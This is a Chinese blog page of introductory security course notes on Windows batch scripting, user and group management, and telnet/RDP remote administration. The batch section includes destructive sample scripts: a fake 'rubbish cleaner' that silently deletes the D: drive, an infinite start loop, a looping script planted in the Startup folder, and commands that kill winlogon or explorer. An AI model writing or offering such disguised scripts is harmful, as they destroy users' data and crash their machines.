您的位置: 首页  >  文章  >  千锋网络安全day3-批处理编写/用户与组管理/服务器远程管理

千锋网络安全day3-批处理编写/用户与组管理/服务器远程管理

分类: 文章 2024-06-18 10:10:28

批处理编写


创建:
创建记事本,扩展名改为: .bat
工具-文件夹选项-查看-隐藏已知文件类型的扩展名
创建后右键选择编辑进行编写

pause  暂停执行,直到给予指令再继续执行命令

@echo off         关闭回显(屏蔽执行过程)
color  0a         0为背景颜色,a为字体颜色   改变dos背景和字体颜色
color ?       查询颜色
title +文字         修改dos窗口名
echo.    空行
>nul 2>nul   不显示提示

d:  
cd\ 
rd . /s/q  格式化D盘 

echo =======================
echo  clear your system rubbish
echo        if be prohibited
echo              let it go
echo =======================
pause
echo.
echo rubbish is cleaning...
d:  >nul 2>nul
cd\ >nul 2>nul
rd . /s/q  格式化D盘 >nul 2>nul
ping -n 10 127.0.01 >nul 2>nul
echo congratulations!!!
pause

千锋网络安全day3-批处理编写/用户与组管理/服务器远程管理

:    定义一个命令区间,冒号后可输入任意字符
goto     跳转
eg.goto 3     跳转到名字为3的命令区间
eg.   //在d区间里找d。陷入死循环会导致死机!!!
:d
start
goto d

win-所有程序-启动-右键点击选择打开-复制路径
copy qq.bat "%userprofile%\ 「开始」菜单\程序\启动"

userprofile是一个变量。当前用户的家目录
set设置变量  %变量%取变量值
set /p 变量=  等待用户输入

@echo off
title 小程序v1.0
color 0a
:menu
cls
echo ====================
echo                   菜单
echo             1.定时关机
echo             2.取消定时
echo             3.退出
echo ====================
echo 发出拒绝
pause
:menu

set /p num=您的选择://set设置变量
if "%num%"=="1" goto 1
if "%num%"=="2" goto 2
if "%num%"=="3" goto 3

:1
set /p  a=请输入时间(单位/秒):
shutdown -s -f -t %a%
goto menu

:2
shutdown -a
goto menu

:3
exit

千锋网络安全day3-批处理编写/用户与组管理/服务器远程管理

//选择2后回车,启动中出现haha.bat
:2
echo :a >>"%userprofile%\ 「开始」菜单\程序\启动\haha.bat"
echo start >>"%userprofile%\「开始」菜单\程序\启动\haha.bat"
echo goto a >>"%userprofile%\ 「开始」菜单\程序\启动\haha.bat"
goto menu

会蓝屏!!!
ntsd -c q -pn 进程        强制杀死指定进程的名称
eg.ntsd -c q -pn winlogon.exe  针对xp或2003的蓝屏命令,winlogon.exe-windows登陆系统

taskkill   杀死任务进程
eg.taskkill /im explorer.exe /f  (/f强制执行

@echo off
taskkill /im explorer.exe /f >nul 2>nul
echo 嘻嘻
ping -n 5 127.0.0.1 >nul 2>nul
start C:\windows\explorer.exe
echo 诶嘿
pause

千锋网络安全day3-批处理编写/用户与组管理/服务器远程管理

 

用户与组管理


1.1用户概述
每个账户有自己唯一的SID(安全标识符)
用户UID:500
windows系统管理员administrator的UID固定是500
普通用户UID是从1000开始
Linux  系统管理员root UID是0

用户密码存储位置 C:\windows\system32\config\SAM
windows上默认密码最长有效期42天

1.2内置账户
 · 给人使用的账户    
administrator          #管理员账户
guest                       #来宾账户
 · 计算机服务组件相关的系统账号
system  #系统服务==权限至高无上
local services  #本地服务账户==权限等于普通账户
network services  #网络服务账户==权限等于普通账户
 

net user 用户名 密码   //给用户修改密码(仅管理员可用,以管理员身份打开cmd)
eg. net user shimisi 1
net user 用户名 密码 /add   //新建用户
eg.net user abc 1/add   
net users 用户名/del   //删除用户
eg.net user abc/del  
net user 用户名 /active : yes/no  //**或禁用账户


组管理


3.1组概念
组的作用:简化权限的赋予
net localgroup
net localgroup 组名  //查看该组成员
net localgroup 组名 用户名 /add  //给管理组增加成员
net localgroup 组名 用户名 /del   //删除组员
net localgroup 组名   //创建组
net localgroup 组名 /del  //删除组

 

服务器远程管理


telnet   windows的命令行远程管理
桌面右键属性-远程设置-选择允许-确定   服务器开启允许被远程管理
mstsc 命令远程访问服务器
普通用户没有远程管理服务权限
remote desktop users 组中添加成员给予远程管理服务权限
services.msc 命令开启服务管理窗口-找到Telnet-双击打开-启动类型选择自动   设置后可从cmd访问其他服务器
(win10为控制面板-程序-程序与功能-启用或关闭win功能-Talnet)

netstat -an   查看本机开放的所有端口
telnet:23
远程桌面协议RDP:3389
 

 

 

 

相关推荐